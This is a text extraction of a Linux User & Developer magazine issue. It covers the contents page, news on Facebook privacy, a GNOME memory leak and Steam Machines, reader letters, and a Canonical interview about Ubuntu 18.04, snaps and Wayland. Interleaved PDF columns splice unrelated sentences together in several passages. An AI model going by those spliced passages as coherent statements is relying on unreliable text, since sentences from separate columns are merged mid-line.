0% found this document useful (0 votes)
49 views

Linux User & Developer 191 - Control Containers

Uploaded by

Lyc Jean
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
49 views

Linux User & Developer 191 - Control Containers

Uploaded by

Lyc Jean
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 98

exclusive canonical interview

www.linuxuser.co.uk

The essential magazine


for the GNU generation
your ultimate guide

Level up your Docker skills • Master Vagrant

3
new ubuntu!
scripting • Perfect configs for Ansible & Puppet

Special report

Ruby isn’t dead


features
We will do everything of
to survive
- Creator, Yukihiro “Matz” Matsumoto
18.04
cloud, containers, core
desktop, iot, server

Pi 3 B+ + expert
projects to try
>S uper-size Pi storage
tutorials
> Git: Master version control
> Make an assistant AI > Arduino: DIY coffee maker
with Mycroft Core > Security: Stop root attacks

MX Linux 17.1 Security distros Also inside


» Kernel in-depth
The wonderfully built distro that Tested: Four of the best secure » TerraMaster’s
you’ve probably never heard of distros in the Linux universe new NAS tested
The magazine for
the GNU generation

Welcome
Future PLC Quay House, The Ambury, Bath BA1 1UA

Editorial
Editor Chris Thornett
[email protected]
01202 442244
Designer Rosie Webber
Production Editor Ed Ricketts

to issue 191 of Linux User & Developer


Editor in Chief, Tech Graham Barlow
Senior Art Editor Jo Gulliver

Contributors
Dan Aldred, Joey Bernard, Christian Cawley, John Gowers,

In this issue
Toni Castillo Girona, Jon Masters, Bob Moss, Paul O’Brien,
Mark Pickavance, Calvin Robinson, Mayank Sharma, Alex Smith

All copyrights and trademarks are recognised and respected.


Linux is the registered trademark of Linus Torvalds in the U.S.

» Control Containers, p18


and other countries.

Advertising

» The Future of Ruby, p32


Media packs are available on request
Commercial Director Clare Dove
[email protected]

» Ubuntu 18.04, p58


Advertising Director Richard Hemmings
[email protected]
%01225 687615
Account Director Andrew Tilbury
[email protected]
%01225 687144
Account Director Crispin Moller
Welcome to the UK and North America’s
[email protected]
%01225 687335
favourite Linux and open source magazine.
International
It’s been another fascinating month in the open
Linux User & Developer is available for licensing. Contact the
International department to discuss partnership opportunities
source world. Of course, Ubuntu 18.04 LTS
International Licensing Director Matt Ellis
       [email protected]
has landed, but we’ve also seen strong open
Subscriptions
source advocate Nextcloud snag a seven-figure
Email enquiries [email protected]
UK orderline & enquiries 0344 848 2852
deal to supply the German federal government
Overseas order line and enquiries +44 (0)344 848 2852 with a private Bundescloud for 300,000 civil
Online orders & enquiries www.myfavouritemagazines.co.uk
Head of subscriptions Sharon Todd servants. Then Microsoft floored a lot of people
Circulation by revealing an entirely Linux-based OS for a
Head of Newstrade Tim Mathers
microcontroller it is touting for IoT devices. The
Production
Head of Production US & UK Mark Constance Linux Foundation’s Jim Zemlin describes Microsoft’s Linux usage
Production Project Manager Clare Scott
Advertising Production Manager Joanne Crosby as the “new normal” – and we shouldn’t be surprised, plenty of
Digital Editions Controller Jason Hudson
Production Manager Nola Cokely companies now use Linux and FOSS when it makes money and
Management practical sense. To that end we turn to our main feature this month,
Managing Director Aaron Asadi
Editorial Director Paul Newman where we’ll show you how to use open source containers and
Art & Design Director Ross Andrews
Head of Art & Design Rodney Dive products from Ansible, Docker, Puppet and Vagrant to help recover
Commercial Finance Director Dan Jotcham
systems and make deployments easier (p18). We’ve also covered
Printed by
Wyndeham Peterborough, Storey’s Bar Road, what open source Ubuntu has to offer this time (p58), not just for
Peterborough, Cambridgeshire, PE1 5YS
desktop, but also server, cloud, containers and core. Enjoy!
Distributed by
Marketforce, 5 Churchill Place, Canary Wharf, London, E14 5HU Chris Thornett, Editor
www.marketforce.co.uk Tel: 0203 787 9001
ISSN 2041-3270
We are committed to only using magazine paper which is derived from responsibly
managed, certified forestry and chlorine-free manufacture. The paper in this magazine
was sourced and produced from sustainable managed forests, conforming to strict New Letters prize
The best letter wins an
environmental and socioeconomic standards. The manufacturing paper mill holds full
FSC (Forest Stewardship Council) certification and accreditation

All contents © 2018 Future Publishing Limited or published under licence. All rights

iStorage datAshur Pro!


reserved. No part of this magazine may be used, stored, transmitted or reproduced in
any way without the prior written permission of the publisher. Future Publishing Limited
(company number 2008885) is registered in England and Wales. Registered office:
Quay House, The Ambury, Bath BA1 1UA. All information contained in this publication
is for information only and is, as far as we are aware, correct at the time of going
to press. Future cannot accept any responsibility for errors or inaccuracies in such
information. You are advised to contact manufacturers and retailers directly with regard
[email protected]
to the price of products/services referred to in this publication. Apps and websites
mentioned in this publication are not under our control. We are not responsible for their Twitter: Facebook:
contents or any other changes or updates to them. This magazine is fully independent
and not affiliated in any way with the companies mentioned herein.
@linuxusermag facebook.com/LinuxUserUK
If you submit material to us, you warrant that you own the material and/or have the
necessary rights/permissions to supply the material and you automatically grant
find more details on page 11
Future and its licensees a licence to publish your submission in whole or in part in any/
all issues and/or editions of publications, in any format published worldwide and on
associated websites, social media channels and associated products. Any material you

For the best subscription deal head to:


submit is sent at your own risk and, although every care is taken, neither Future nor its
employees, agents, subcontractors or licensees shall be liable for loss or damage. We
assume all unsolicited material is for publication unless otherwise stated, and reserve

myfavouritemagazines.co.uk/sublud
the right to edit, amend, adapt all submissions.

Save up to 20% on print subs! See page 30 for details

Future plc is a public Chief executive Zillah Byng-Thorne


company quoted on the Non-executive chairman Peter Allen
London Stock Exchange Chief financial officer Penny Ladkin-Brand
(symbol: FUTR)
www.futureplc.com Tel +44 (0)1225 442 244
www.linuxuser.co.uk 3
Contents
18 cover feature top features of
58

Containers
40

OpenSource Features Tutorials


06 News 18 Control Containers 36 Essential Linux: Git
Mozilla offers a partial solution
 Containers and scripts can save you Get started with Git and learn how to
for Facebook privacy issues time, help to recover systems and make use its version control capabilities
deployments easier. Bobby Moss explains
10 Letters how to use Docker, Vagrant, Puppet, 40 Arduino: DIY coffee dispenser
Write on, readers Ansible and more to create containers  up your own automated office
Set
in the cloud or elsewhere, work with coffee club with the help of an Arduino
12 Interview virtualisation, and manage deployments that’s used as a keycard reader
We chat with Canonical about its

vision for Ubuntu 18.04 – and beyond 58 Top features of Ubuntu 18.04 44 Security: privilege escalation
Ubuntu ‘Bionic Beaver’ 18.04 represents Learn how attackers may gain root
16 Kernel Column the first long term support release of a new access by exploiting bugs and services
Jon Masters on the latest happenings
 generation of Canonical’s leading
Linux distribution, and brings with it a raft 48 Python: TensorFlow
SpecialReport of exciting changes. We take an in-depth
look at the new and improved features
across all flavours of 18.04, from Desktop
Use the open source neural network
to automatically classify images

32 Ruby is alive and well and Server to Cloud, Containers and Core, 52 Programming: Rust
The venerable language may be 25 to see how it can make your computing life An introduction to systems
years old, but it’s still going strong easier and more secure programming with the ‘safe C’

4
Issue 191
May 2018
facebook.com/LinuxUserUK 94 Free downloads
Twitter: @linuxusermag We’ve uploaded a host of
new free and open source
software this month

86
72
76

74 88
Practical Pi Reviews Back page
72 Pi Project: PipeCam 81 Group test: Security distros 96 Happy Forever Day
Electronics technician Fred Fourie We put four specialised builds that Another intriguing short story
wanted to build an affordable promise enhanced security to the test from sci-fi author Stephen Oram
underwater camera rig using to see which keeps you the safest
inexpensive and easily sourceable
components. His ingenious solution, 86 Reviews: Hardware
PipeCam, involved a Raspberry Pi – How well do the TerraMaster F4-420
and plenty of waterproof sealant NAS and the Trendnet TEW-817DTR
portable wireless router perform?
74 Boot your Pi 3 B+ from USB
You might not know it, but the new 88 Distros: MX Linux 17.1
Pi 3 B+ can be booted from a USB- A joint effort between the antiX and
connected drive rather than an SD MEPIS communities which touts
card. Find out how to set it all up a clean and slick desktop experience

76 Mycroft: DIY voice assistant 90 Fresh FOSS SUBSCRIBE TODAY


Create your own Alexa/Google Home/ Searchmonkey JAVA 3.2.0, beets 1.4.6 Save up to 20 per cent when you
Siri/Cortana alternative using Mycroft CLI media library, Gambas 3.11.0 for subscribe! Turn to page 30 for
running on a Pi – and ensure all your creating graphical apps for Linux, more information
data stays within your control! and SimpleScreenRecorder 0.3.10

www.linuxuser.co.uk 5
06 News & Opinion | 10 Letters | 12 Interview | 16 Kernel Column

security

Facebook investigated, apologises


for breach of trust
Mozilla offers solution: Facebook Container protects browsing
activity and limits data-tracking
The headline-grabbing Cambridge Analytica
scandal has hit users of all platforms,
highlighting once again the importance of
openness when it comes to the treatment
of personal data by online services such as
social networks. Keeping in mind that just
270,000 people used the ‘thisisyourdigitallife’
app, it is staggering that data for 50 million
people (including friends and family of the
app users) was then farmed, and used for
political-campaign targeting in a process that
began in 2014.
Mark Zuckerberg, as ever doing his best
to distance Facebook from scandal, took
the time to issue a full-page apology in
several newspapers. In it, the billionaire CEO
apologises for the 2014 breach of trust “that
leaked Facebook data of millions of people”
and reveals that along with limiting data to
third-parties, Facebook is “also investigating
every single app that had access to large
amounts of data before we fixed this,”
working on the basis that others have been
able to gather similar volumes of data.
Despite the apologies (“I promise to do
better for you”), and new privacy features in model in the history of the world Mozilla was quick to remind users that
the mobile app, the fact remains that this and someone took advantage of it.” tracking is a problem (“pages you visit
data was acquired without illegally breaching Some feel that the damage has already on the web can say a lot about you. They
servers. No one broke in or stole a database. been done; Facebook’s brand was already can infer where you live, the hobbies you
Rather, as Nick Thompson of CBS News tarnished by previous controversies and have, and your political persuasion”), and
observed, “It worked because Facebook has suspicion. It seems unlikely, however, that that Facebook “has a network of trackers
built the craziest most invasive advertising the platform will be abandoned overnight, on various websites. This code tracks you
giving the social network the opportunity to invisibly.” Thus Mozilla’s add-on aims to
at least partially recover. segregate Facebook activity, essentially
Targeting users fed up with Facebook’s isolating it from your other online activities.
privacy abuses – particularly following the While Mozilla is at pains to highlight that
Cambridge Analytica scandal – Mozilla has the Cambridge Analytica incident could
issued a new browser extension that aims not have been avoided with the use of its
to tackle the issue of Facebook tracking. Facebook Container extension, the tool at
Two years in development – although that least gives users the choice to limit what
development has been recently accelerated they share. Importantly (and unsurprisingly
for a prompt release – Facebook Container given the circumstances), Mozilla collects no
offers a solution to that most annoying information from the extension; it records
Above It’s time to take control of Facebook data question: “How do I quit Facebook without only when the extension has been installed
privacy with Mozilla’s Facebook Container actually quitting?” or removed.

6
Distro feed
Top 10
(Average hits per day, 30 days to 6 April 2018)

1. Manjaro 3248

2. Mint 2806

3. Ubuntu 1887

4. Debian 1526

5. elementary 1325

6. Solus 1290

7. MX Linux 1225

8. Fedora 968

9. Zorin 862

10. Antergos 783

software This month

GNOME Shell memory ■ In development (4)


■ Stable releases (22)

leak bug discovered


BSD operating
systems have recently
seen a renaissance,
with FreeBSD-based
If it’s not fixed soon, Ubuntu 18.04 could TrueOS hovering in
the top 10 and other
ship with an annoying bug options in the top 100

Memory leaks have most famously affected usage from 100M to 350M. It does not free it Highlights
browsers in the past, so the idea that a up even if you close all windows. In my 4GB
desktop environment should be subject machine, it means that either I restart every TrueOS
to one of these resource-draining bugs is day or I start facing swap issues the second TrueOS prides itself on being easy to
surprising. But GNOME Shell 3.26.2, which is day”, they said. install, with a graphical installation
most commonly found in Ubuntu 17.10, has Subsequent investigation has proved that system and a good number of pre-configured
a leak that has been spotted by a number of the problem does indeed exist, summarised desktop environments.
users, and reported as a bug. best by developer Georges Basile Stavracas:
It appears the bug is triggered by “I suspect we’re leaking the final buffer OpenBSD
performing actions with an associated somewhere”. He has traced the issue, noting Security-focused, OpenBSD 6.3
animation. Things such as opening the that “something is going on with the Garbage features ISO support in the virtual
overview, minimising windows or simply Collector.” A tool for automatic resource machine daemon, updates to LibreSSL and
switching them can result in a system recovery, Garbage Collection principles have OpenSSH, and SMP for ARM64 systems.
that grinds to a halt after a few hours of been used for over 65 years, so a failure here
use, hitting productivity. That’s not ideal, might be seen as somewhat embarrassing. NetBSD
especially if you’re using a laptop; you can’t Attempting to unpack the issue, Stavracas This popular implementation of the
just reboot your way out of trouble if the reported that after giving up hope, “I found Berkeley Software Distribution is
added load has also drained your battery. a very interesting behavior that I could a lightweight OS designed to work on a wide
Once triggered, RAM use increases minute reproduce […] Triggering garbage collection range of hardware platforms.
by minute. The problem is best illustrated was able to reduce the amount of memory
by launchpad.net user Jesus225: “No used by GNOME Shell to normal levels.”
matter what you do, gnome-shell eats up It’s perhaps surprising that it took so long Latest distros
RAM slowly… After one day of usage (just for the bug to be spotted, but will the fix be available:
web browsing) gnome-shell increased RAM ready in time for Ubuntu 18.04 LTS?
filesilo.co.uk

www.linuxuser.co.uk 7
OpenSource Your source of Linux news & views

gaming

Steam Machines on the way out?


Valve announces a change of strategy for its Linux boxes
Once touted as the brave new future for PC
gaming, Steam Machines – console-like
PCs running the Linux-based SteamOS and
produced by Alienware, Asus and others –
somehow went largely unnoticed. Perhaps
it was SteamOS’s lack of traction, or perhaps
Steam’s own Link game-streaming boxes
nixed the idea of Steam Machines before it
could really get going.
Whatever the case, Valve is no longer
promoting Steam-powered PCs via the
Hardware link on the Steam website or its
desktop client – although the page itself has
not been removed.
When its “routine cleanup” eventually
morphed into an ‘anti-Steam Machines’
conspiracy theory, Valve opted to address
concerns. Overall, it appears to be a general Above Steam Machines aren’t quite dead, but they are on life support
change of strategy, although the Steam
Machines are still available; they can be found. In a blog post on 4 April, Valve’s and customers alike, including those not
searched for in Steam, and the Steam Pierre-Loup Griffais emphasised that on Steam. SteamOS will continue to be our
Machines page is still live, just not easily Steam’s strategy hasn’t really changed. medium to deliver these improvements to our
“While it’s true Steam Machines aren’t customers, and we think they will ultimately

It’s true Steam exactly flying off the shelves… we’re still
working hard on making Linux operating
benefit the Linux ecosystem at large.”
Among these improvements are
Machines aren’t exactly systems a great place for gaming and
applications. We think it will ultimately
investment in the Vulkan graphics API and
shader pre-caching. Steam Machines or not,
flying off the shelves result in a better experience for developers Valve isn’t giving up on Linux just yet.

hardware
Intel discontinues its graphics updater
Many new distros just don’t need it any more
As Linux distributions develop and improve, Tool as of version 2.0.6. The final version 2.0.6 In the case of Ubuntu and Fedora at least,
it isn’t unusual for third-party tools and of the update tool was targeted specifically the inclusion of Intel graphics support in
software to adapt. The Intel Graphics at both Ubuntu 17.04 and Fedora 26. Earlier these distributions (and downstream) means
Update Tool is a good example. Released in revisions for those Linux distributions are no that the update tool is no longer required.
2013 to give Linux users a safe and reliable longer being supported.” With other distros, the case isn’t so clear-
way to install and upgrade to stable drivers Previously known as the Intel Graphics cut. Over the years, many users have relied
and firmware on Intel graphics hardware, five Installer for Linux, the tool was used widely on the Intel graphics support forum for help
years down the line the software has become on systems with Intel graphics. Typically and assistance. This will not immediately
largely redundant. laptops, some desktops and many all-in- close; the blog announced that the forum
The Intel graphics blog announced on ones also rely on Intel graphics. So with the will be maintained for a while, before being
8 March that “users will notice Fedora 27 and update tool put out to pasture, how will you reconfigured as an archive. Users running
Ubuntu 17.10 and beyond are very current. keep your Linux system’s graphics up to older distros and hardware will be hit hardest
Therefore, we are discontinuing the Update date? Is a new laptop or GFX card required? by this, so upgrade wherever possible.

8
distro update

Pop!_OS: In pursuit of an efficient and


creative environment for users
Since announcing its own Linux distribution called Pop!_OS,
System76 has been building steadily to the launch of 18.04

B
efore Pop!_OS, our attention was focused New installer experience
on ensuring our computer hardware ran The new installer is designed with a story arc of artwork
flawlessly with Linux. When the end of Unity that carries you through the installation and permeates
was announced last year, it created a lot of through the operating system. The installer does four
unknowns among the team; but what started as an things: enables us to ship computers with full-disk
unknown quickly became an opportunity. For over 12 encryption; simplifies the installation process; installs
years, we had been outsourcing one of System76’s most extremely fast; and demonstrates the artwork and style
important customer interactions, the desktop experience that will begin to permeate other areas of the operating
– and during this tenure, we collected tons of data: a list system, as seen in the new Pop!_Shop artwork. Carl Richell
of customer requests for an improved desktop interface. Carl is the founder
Linux excels in the fields of computer science, USB flashing utility and CEO of System76,
engineering and DevOps – this is where our customers Popsicle is a new utility that launches when you double- a manufacturer of
live. It’s important for us to make sure we create the click an ISO in the file manager. It is a USB startup disk Linux computers.
most productive computer environment for them to be creator that can flash one or many hundreds of USB
efficient, free and creative. During the first Pop release, drives at once.
we addressed the most common pain-points we heard
from customers with the Linux desktop: the initial user
setup time, bloatware, the need for up-to-date drivers One of the things we’re most grateful
and software, and a fast and functional app center.
Additionally, it was important that Pop!_OS provided for is having such an active Pop!_OS
a pleasant experience for non-System76 customers.
This meant ensuring Pop!_OS was lighter, faster and community providing feedback
more stable than the experience people were used to.
If Pop!_OS can turn unusable machines into working Other new features include a Do Not Disturb switch to
units, this is a win for a maker. It means wider nix notifications, easy HiDPI and standard DPI switching
accessibility, enabling anyone to create a project using for mixed displays or legacy applications, curated
a more powerful desktop interface. applications in the Pop!_Shop with new artwork, and
It’s with the second launch, 18.04, where we really systemd-boot and kernelstub replace GRUB on new
start to make an impact. So what’s different? UEFI installs.
18.04 was a result of maintaining inclusion and
Heightened security collaboration from the Pop!_OS community team,
Pop!_OS encrypts your entire installation by default. working with elementary OS on the new Linux installer
Our new installer also enables full-disk encryption for and, of course, the massive amount of work that occurs
pre-installs that ship from System76 or another OEM. upstream in GNOME, Ubuntu, Debian, the kernel and
System76’s laptops that use Pop!_OS also receive a countless other projects. There was a lot of testing
feature that provides automatic firmware updates, required in order to ensure Pop!_OS was compatible
ensuring the PC is always secure and reliable. across various types of hardware configurations.
One of the things we’re most grateful for is having such
Performance management an active Pop!_OS community, which has been energetic
18.04 includes an improved battery-level indication so in providing feedback. We’d like to continue improving the
users can stay on top of their remaining power. We’ve OS as a tool to enhance your workflow productivity and
also added a CPU and GPU toggle to switch between we always welcome more feedback. So give Pop a try at
power profiles from the system menu, such as NVIDIA https://system76.com/pop and tell us what you need at
Optimus, energy-saving, high-performance and others. www.reddit.com/r/pop_os.

www.linuxuser.co.uk 9
OpenSource Your source of Linux news & views

Comment

Your letters
Questions and opinions about the mag, Linux and open source
Qubes tips imminent. I thought that I would do a fresh install
Dear LU&D, I enjoyed the Qubes OS tutorial in LU&D189 of Qubes 4.0 and downloaded it.
(Features, p60), and thought I would share with you three This version has a similarly uneven progress bar at the
glitches that might put some newcomers off. install stage and after the reboot the side-to-side motion
Firstly, the installer seems to offer no way to overwrite of the second progress bar froze completely. Leaving
a previous OS (in my case, Windows 10) and instead tried the computer for an hour or so when I came back it had
to squeeze the install into some free space. This meant I nonetheless completed its configuration.
had to create a live USB (I used Mint) just to use its Disks The moral again is, don’t panic! Do not assume
program to delete the partitions. Other readers may because the progress gauge freezes that the process has
benefit from planning this in advance. ‘hung’. Have a cuppa or even a meal before giving up!
Having got past that hurdle I felt some newcomers Anyway, many thanks for the tutorial and I hope my
might be perturbed by the uneven progress of the comments might encourage others to persevere with a
installation, which apparently counts files not megabytes, couple of glitches that turn out to be purely cosmetic, and
and thus appears to ‘stall’ while installing large files to reassure them that once installed the default config is
like the templates. The workaround is not to watch too much more reliable than the slightly uneven installer.
closely: trust that the number of files will increment again River Att
if you leave it for twenty or thirty minutes.
After a reboot I had the chance to select optional Chris: Great advice there. Personally, I’ve not
templates, and these took a while to install, with a experienced the problem you mentioned with being
progress bar that travelled from side to side during the unable to overwrite a Windows OS. In Qubes R3.2’s
process. After playing with Qubes and deciding to use it Installation Summary, under the System option you can
seriously, I noted from the tutorial that a new version was select custom partitioning. On the next screen I was able
to choose ‘I will configure partitioning’ and use a manual
Right Keep calm and partitioning GUI to remove existing OS partitions and
install Qubes: good create the required partitions for Qubes OS (as you would
advice from one of do in GParted). However, this may be issue with Windows,
our readers as we’re usually deleting Linux distros when installing.
Regarding 4.0, we were holding on for the RC4 to be
confirmed as the final, but it didn’t come in time for our
disc deadline, unfortunately. It turned out that the project
released an RC5 before going on to full release, so it was
probably the right call. Fortunately, Qubes OS 3.2 is being
supported for a further year after 4’s release, rather
than the usual six months, because of the new hardware
certification requirements for Qubes 4.0. We would
suggest that if you want to follow the tutorial you should
use 3.2, but for general use we’d recommend grabbing
the latest release.
top tweet
MX Linux is an up-and-coming
distro, but this quick straw poll The missing middle
told us that it probably needed a I love your magazine and have read it since I first decided
little profile-raising help. It’s on to try Linux, and bought it with the Ubuntu 16.04 cover
the disc, so try it out! disc to use as my first Linux OS. I’ve now moved away
from Ubuntu and happily swap between (admittedly

10
Facebook: Twitter:
follow us facebook.com/LinuxUserUK @linuxusermag

Left Don’t delay, fill


in the Linux User &
Competition Developer Reader
Survey today! Help
us make the mag
WIN THIS! even better and get
iStorage 10 per cent off Linux
datAshur products at www.
Pro! myfavourite
magazines.co.uk,
a free copy of the 6th
edition Python Book
and a chance to win a
stylish Varidesk Exec
40 adjustable desk
with your thoughts at [email protected] or, if you worth £495 ($550)!
This issue’s winner: River Att haven’t already done so, please fill in the Linux User and
Impart your Linux wisdom to an adoring audience Developer Reader Survey (https://www.surveymonkey.
or rant if you must – just send your letters to co.uk/r/LUDSurvey2018). The survey is a genuine chance
[email protected]. The best letter wins to guide what we do and already we’ve seen some clear
a 16GB iStorage datAshur Pro USB 3.0 flash drive indications of what you like – so thank you, dear readers,
worth £89! As well as offering XTS-AES 256-bit it’s greatly appreciated.
encryption, this drive will delete a user’s login after
ten failed attempts and hold the data secure for an
admin’s PIN. If the admin fails ten times the drive Sans disc
data is deleted permanently. For more details head The only (two) copies that I could find of issue 188 of
to https://istorage-uk.com. Linux User & Developer, February 2018, did not have
their DVDs. I went ahead and purchased one as I really
wanted the articles on Virtualise Your System, but was
mostly Debian-based) distros without any worry. wondering about getting a DVD with the software. When
The thing I’ve been finding for some time is that I seem I spoke with the vendor, they said that those were the
to be caught in the middle with your articles. You have only ones they had in inventory. I find thieves despicable.
some great features for beginners and what look like David Smith
great tutorials for more advanced users, but I just seem
to be floundering – frustrated that I get all the basics, Chris: Yes, we hate when the tea-leafs rip off the discs
but unable to feel like I can get to grips with the more and skulk away, too. Sorry there were only two copies,
advanced features. David. If everyone wants to see better distribution of
Have you thought about creating guides for those of the magazine please feel free to scream (politely) at our
us who are relatively new to Linux and feel like more than management. You could always tweet @futureplc or use
beginners, but aren’t quite ready to get to grips with the the contact form at www.futureplc.com/contact to ask Below Don’t feed the
more complex stuff? for more copies. Better still, subscribing is the way to go disc rage – leave them
Lee Burgum and the best deals are always at our dedicated magazine on the magazine or
portal https://www.myfavouritemagazines.co.uk/sublud David will find you.
Chris: Thanks for your feedback, Lee. It is hard to please for UK, Europe and US subs. Yes, you there
everyone all the time, but we do try to make it so that
even the complex subjects we cover are accessible to the
‘average’ (if there is such a thing) Linux user. However,
by the sound it of we aren’t quite hitting the mark for a
portion of our loyal readers.
As usual, we’d be interested to know what subjects
interest ‘middling-experienced’ users. You can email us

www.linuxuser.co.uk 11
OpenSource Your source of Linux news & views

Interview canonical

Ubuntu 18.04: Sandboxes,


surveys and GNOME shell
As Canonical continues its pursuit of profitability, we spoke to the Desktop
and Server teams at the company to decipher their ambitions for the
release of 18.04 – and their plans for the future

T
he release of Bionic Beaver is important.
Not only is it the LTS – with five years’
worth of support – that will see millions of
users installing Ubuntu for the first time with
GNOME firmly nestled in the desktop environment
slot, but it could be the release that sees Canonical
through IPO. We spoke to the team in early April
about the overall goals for Ubuntu 18.04 LTS.
WILL COOKE: Typically, we find that most of our
users like to install it once, and then leave it alone,
and know that it’ll be looked after itself. That’s more
important in the cloud environment than it is on the
Will Cooke desktop, perhaps. But the joy of Ubuntu is that you
Will is the desktop can do all of [your] development on your machine,
director at Canonical, and then deploy it to the cloud, running the same
who oversees putting the version of Ubuntu, and be safe in the knowledge
desktop ISO together. that the packages that are installed on your desktop
are exactly the same as the ones that are in your
enterprise installation.
When you’ve got thousands of machines deployed
in the cloud in some way, the last thing you want to
be doing is maintaining those every single year and
upgrading it, and dealing with all the fallout that
happens there. So the overarching theme for Ubuntu
18.04 is this ability to develop locally and deploy binaries that work not only on Ubuntu, but also on
to your servers – the public cloud, to your private Fedora or CentOS or Arch.
cloud, whatever you want to do – your servers. But So as an application developer, for example, not
also edge devices, as well. a desktop application necessarily, but it could be
So we’ve made lots of advances in our Ubuntu a web app, it could be anything – you can bundle
David Britton Core products [see p68], which is a really small, up all of those dependencies into a self-continued
David is the engineering cut-down version of Ubuntu, which ships with just package, and then push that out to your various
manager of Ubuntu the bare minimum that you need to bring a device up devices. And you know that it will work, whether they
Server at Canonical. and get it on the network. So the packages that you run Ubuntu or not. That’s a really powerful message
can deploy to your service, to your desktop, can also to developers: do your work on Ubuntu; package it
be deployed to the IoT devices, to the edge devices, up; and push it out to whatever device that is running
Top Right You can try to your network switches. That gives you a really Linux, and you can be reliant on it continuing to work
Communitheme with an early unparalleled ability and reliability to know that the for the next five years.
snap by installing it with snap stuff you’re working on can be packaged up, pushed
install communitheme or wait out to these other devices, and it will continue to What’s the common problem that devs have with
for 18.10. Once installed just work in the same way that it works on your desktop. DEBs and RPMs that has led to the snaps format?
logout out and select it from the A key player in that story is the snap packages WC: There are a few. Packaging DEBs – or RPMs,
cog options that we’ve been working on. These are self-contained for that matter – is a bit of a black art. There’s a

12
Quick guide
Beyond 18.04: GNOME Shell 4
Wayland, the display server protocol, wasn’t a display server crash. For example, if the
stable enough to be the default for Ubuntu display server crashes while you are working
18.04 LTS, but it’s definitely coming and will on a LibreOffice document, there’s a chance
benefit from other technologies that are that it may not be auto-saved, and you’ll
being worked on. As well as PipeWire (for lose all of that work: “At the moment, if the
improving video and audio under Linux), we’re compositor Mutter in the GNOME stack
likely to see an architecture change with crashes in Wayland, it crashes Wayland
GNOME Shell 4. However, things aren’t that and it crashes your entire session. So you’re
simple, as Will Cooke explained: “GNOME thrown back to the login screen, and all of the
Shell 4 shell is a bit of a strange topic. applications that you’re running get killed and
GNOME tell me they have never said there is you’re back in the position of just switching
going to be a GNOME Shell 4. There will be your machine on.”
a GNOME 4 – you know, a new version of all One of the considerations for GNOME 4 is
the libraries and all the applications and all to make a crash play out more like X.Org in
that kind of thing. But they haven’t actually the future: “The display server can restart Above Regardless of the confusion over
committed to doing a whole new shell or and the shell can restart, and all of the GNOME Shell 4’s existence, Canonical
changing the way that it works.” applications will continue running in the seems confident that the new shell will
One of the ideas for GNOME 4 is to background. So you might not even notice bring a change to how Wayland deals with
significantly change the experience during that there was a problem.” display server crashes

certain amount of magic involved in that. And the physically won’t be able to read those files off the
learning process to go through it, to understand how disk. They don’t exist as far as it’s concerned. So
to correctly package something as a DEB or RPM – that, in my mind, are the two key stories. The write-
the barrier to entry is pretty high, there. So snaps once, run-anywhere side of things, and then the
simplify a lot of that. confinement security aspect as well.
Again, part of the fact, really, is this ability to
bundle all the dependencies with it. If you package With snaps, you’ve got a format that allows
your application and you say, “Okay, I depend on proprietary products to come to Linux much more
this version of this library for this architecture,” then easily than before. Do you not feel that there’s a
the dependency resolution might take care of that
for you. It probably would do. But as soon as your
danger that it creates no inclination to actually
open up those products? You can
underlying OS changes that library, for example, then
your package breaks. And you can never be quite
WC: At the end of the day, it’s the users that are
going to choose which application they want. We’ve
do all of your
sure where that package is going to be deployed, and seen a lot of interest in Spotify, for example. It was development
what version of what OS it’s going to end up on. there anyway – we’re just making it a lot easier for
So by bundling all of that into a snap you are people to get their hands on it, and indeed they do on your
absolutely certain that all of your dependencies are
shipped along with your application. So when it gets
want to get their hands on it.
From a pragmatic point of view and from a user-
machine, and
to the other end, it will open and run correctly. friendliness point of view as much as anything, given then deploy it
The other key feature, in my mind, is the security that all of the other tools that you might need…
confinement aspect. X.Org, for example, is a bit long if you’re a web developer [for example], there are to the cloud
in the tooth now. It was never really designed with dozens of IDEs. If what’s stopping you from using
secure computing in mind. If something is running Linux is that you can’t use Skype or something like
as a root, or it’s running as your user, then it has the that, because you have to for work, then absolutely,
permissions of that user that’s running it. let’s solve those user cases and open it up to more
So you can install an application where the dev, and more people.
for example, could go into your home directory, go
into your SSH keys directory, make a copy of those, Going on to talk about aesthetics a little,
and email them off somewhere. It will do that with I wondered how the Ubuntu community theme
the same permissions as the user that’s running (Communitheme) was progressing?
it. And yeah, that’s a real concern. With snaps and WC: It’s going well, yeah. So it’s not quite good
confinements, you can say, “This application, this enough for 18.04. There’s still quite a few bugs that
snap, is not allowed access to those things.” It need fixing, specifically around GTK+ 2 applications.

www.linuxuser.co.uk 13
OpenSource Your source of Linux news & views

window over the top of another application and steal


things that way.
So security-wise, Wayland is definitely much
better than X.Org. So if we were intending to ship
Wayland in 18.04 and then support it for five years,
we had to be sure that it met not only our quality
requirements, but the use cases for our users.
So we shipped it in 17.10 as the default, and then
if there were problems with it, you could quite easily
switch to X.Org. The feedback we got from our users
was that it’s not quite stable enough, and that’s a
combination of bugs in Wayland, bugs in display
drivers, strange hardware that’s out there. The other
one was screen sharing, and that was a critical
request. Wayland, at the moment, doesn’t allow
that. It’s in the works, and it will come in time, but it
wasn’t there today.
Above A tip for you: Canonical’s GTK+ 3, I’d say, is pretty much done now, theme-
corporate-focused Ubuntu wise. GTK+ 2 applications – there’s only a few of There are a couple of technologies that seem to
Advantage support suite is them, but there are some bugs that need fixing. be in the works in regard to Wayland, such as
actually free for up to three But yes, it’s looking really good. It looks fresh, PipeWire (https://pipewire.org) you’ve alluded to –
machines. It includes a Livepatch it looks very professional. So we’ll be looking to can you tell us more about that?
feature that installs hot patches ship that in 18.10. But in the meantime, we’re also WC: PipeWire’s been described as PulseAudio
for your kernel, so you’ll always be working on getting it packaged up as a snap for for video. That’s quite a tidy explanation. But the
up to date with any of the major 18.04 users to install. So if you want to try the new problem with that is, in the early days of PulseAudio,
CVEs (vulnerabilities) theme, you can snap-install it, log into a new session it didn’t have a stellar reputation. I think that [the
which will give you that theme, and that snap will be PipeWire devs] are quite keen to avoid drawing those
refreshed pretty much every single night. In the next similarities between the two projects. But it will give
cycle, the 18.10 cycle, we should see it on there by us a pipeline video bus, if you like, where you can
default, which is very exciting. plug different bits in at different places –
as you can with audio. You could have audio coming
The switch to X.Org from Wayland as the default – out of your speakers. You could have it coming out
